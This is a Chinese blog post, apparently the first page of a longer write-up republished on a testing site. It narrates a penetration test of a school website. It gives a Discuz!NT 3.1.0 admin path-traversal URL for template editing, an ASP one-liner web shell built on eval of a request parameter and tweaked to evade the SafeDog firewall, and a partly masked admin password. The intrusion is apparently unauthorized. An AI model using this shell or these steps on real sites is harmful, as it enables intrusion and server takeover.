对某网站的一次简单渗透测试

发表于:2017-4-20 11:50

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:Luan's Blog    来源:51Testing软件测试网采编

  此文纯属虚构,纯属娱乐,内容较小白,大牛飘过。
  今天阳光明媚,帮我以前学校再做次安全测试
  曾经测试过,主站是动易CMS2006,网上没有公开的漏洞
  中间件是IIS7.5,配置不当存在一个目录浏览漏洞,也没什么用。
  通过网站主页下方的信息得知网站是别人制作的:
  然后我对XXXX网络公司进行了安全测试,得到分站:www.****.com.cn:82的超级管理员密码**wl****1917
  论坛程序是 Discuz!NT 3.1.0 ,后台可以Getshell:
  访问 http://www.****.com.cn:82/admin/global/global_templatesedit.aspx?path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default
  即可编辑对应的rss.aspx文件,改成安全检测脚本。
  然后访问,发现被安全狗拦截了。。。
  看起来是个老版本的安全狗,管理员没更新过..
  随便改改一句话木马:
  <%
  dim luan
  luan=request("luan")
  response.write("Hello " & luan)
  eval luan
  %>
  然后就成功过狗了……..
  用菜刀2010连接,发现提示403:
21/212>
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号